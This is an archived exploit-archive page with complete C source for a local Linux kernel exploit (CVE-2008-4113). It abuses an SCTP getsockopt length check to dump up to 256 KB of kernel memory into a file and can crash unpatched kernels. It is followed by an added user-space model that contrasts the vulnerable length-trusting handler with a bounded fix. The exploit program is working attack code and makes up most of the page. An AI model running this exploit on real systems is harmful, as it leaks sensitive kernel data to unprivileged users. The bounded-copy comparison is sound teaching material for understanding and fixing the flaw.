Protocol kernel memory disclosure vulnerability
Linux Kernel < 2.6.26.4 SCTP Kernel Memory Disclosure Exploit
Author: milw0rm  Source: milw0rm  Updated: 2009-1-6
/*
 * cve-2008-4113.c
 *
 * Linux Kernel < 2.6.26.4 SCTP kernel memory disclosure
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113
 *
 *   The sctp_getsockopt_hmac_ident function in net/sctp/socket.c in the Stream
 *   Control Transmission Protocol (sctp) implementation in the Linux kernel
 *   before 2.6.26.4, when the SCTP-AUTH extension is enabled, relies on an
 *   untrusted length value to limit copying of data from kernel memory, which
 *   allows local users to obtain sensitive information via a crafted
 *   SCTP_HMAC_IDENT IOCTL request involving the sctp_getsockopt function.
 *
 * Notes:
 *
 *   If SCTP AUTH is enabled (net.sctp.auth_enable = 1), this exploit allows an
 *   unprivileged user to dump an arbitrary amount (DUMP_SIZE) of kernel memory
 *   out to a file (DUMP_FILE). If SCTP AUTH is not enabled, the exploit will
 *   trigger a kernel OOPS.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/sctp.h>

#ifndef SCTP_HMAC_IDENT
#define SCTP_HMAC_IDENT 22
#endif

#define DUMP_SIZE 256*1024
#define DUMP_FILE "mem.dump"

int
main(int argc, char **argv)
{
    int ret, sock;
    FILE *dumpfile;
    char *memdump, *err;
    socklen_t memlen = DUMP_SIZE;

    memdump = malloc(DUMP_SIZE);
    if (!memdump) {
        err = "malloc(3) failed";
        printf("[-] Error: %s (%s)\n", err, strerror(errno));
        return 1;
    }
    memset(memdump, 0, DUMP_SIZE);

    printf("[+] creating IPPROTO_SCTP socket\n");

    sock = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
    if (sock == -1) {
        err = "socket(2) failed";
        printf("[-] Error: %s (%s)\n", err, strerror(errno));
        return 1;
    }

    printf("[+] getting socket option SCTP_HMAC_IDENT with length of %d\n", memlen);

    ret = getsockopt(sock, SOL_SCTP, SCTP_HMAC_IDENT, memdump, &memlen);
    if (ret == -1) {
        err = "getsockopt(2) failed";
        printf("[-] Error: %s (%s)\n", err, strerror(errno));
        return 1;
    }

    printf("[+] dumping %d bytes of kernel memory to %s\n", memlen, DUMP_FILE);

    dumpfile = fopen(DUMP_FILE, "wb");
    if (!dumpfile) {
        err = "fopen(3) failed";
        printf("[-] Error: %s (%s)\n", err, strerror(errno));
        return 1;
    }
    fwrite(memdump, 1, memlen, dumpfile);
    fclose(dumpfile);

    printf("[+] done.\n");

    return 0;
}

// milw0rm.com
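
The root cause named in the header comment, a getsockopt handler that lets the caller's length bound the copy, modelled in user space beside a version bounded by the object's real size. This is an added example, not code from the original exploit or from the kernel source; `fake_kmem`, `getopt_trusting`, `getopt_bounded` and `leaked_bytes` are hypothetical names and the data is constructed.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for kernel memory: the option's object, then
 * unrelated data the caller must never see. */
struct fake_kmem { unsigned char hmac_ids[8]; unsigned char adjacent[24]; };
static const struct fake_kmem kmem = {
    {0, 1, 0, 3, 0, 0, 0, 0}, "ADJACENT-KERNEL-SECRET"
};

/* Vulnerable pattern: only the caller-supplied length bounds the copy. */
static int getopt_trusting(void *ubuf, size_t *ulen)
{
    /* The model stops at the end of its fake memory to stay well defined. */
    size_t n = *ulen > sizeof kmem ? sizeof kmem : *ulen;
    memcpy(ubuf, &kmem, n);
    return 0;
}

/* Hardened pattern: the object's real size bounds the copy; the caller's
 * length must be large enough and is then set to the amount copied. */
static int getopt_bounded(void *ubuf, size_t *ulen)
{
    size_t need = sizeof kmem.hmac_ids;
    if (*ulen < need)
        return -EINVAL;
    memcpy(ubuf, kmem.hmac_ids, need);
    *ulen = need;
    return 0;
}

/* Count bytes of adjacent data that reached the caller's buffer. */
static size_t leaked_bytes(int (*handler)(void *, size_t *), size_t req)
{
    unsigned char ubuf[sizeof kmem] = {0};
    size_t i, n = 0;
    if (handler(ubuf, &req) != 0)
        return 0;
    for (i = sizeof kmem.hmac_ids; i < sizeof ubuf; i++)
        n += (ubuf[i] != 0);
    return n;
}

int main(void)
{
    printf("trusting: %zu leaked, bounded: %zu leaked\n",
           leaked_bytes(getopt_trusting, 32), leaked_bytes(getopt_bounded, 32));
    return 0;
}
```
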
Responsible editor: 朱倩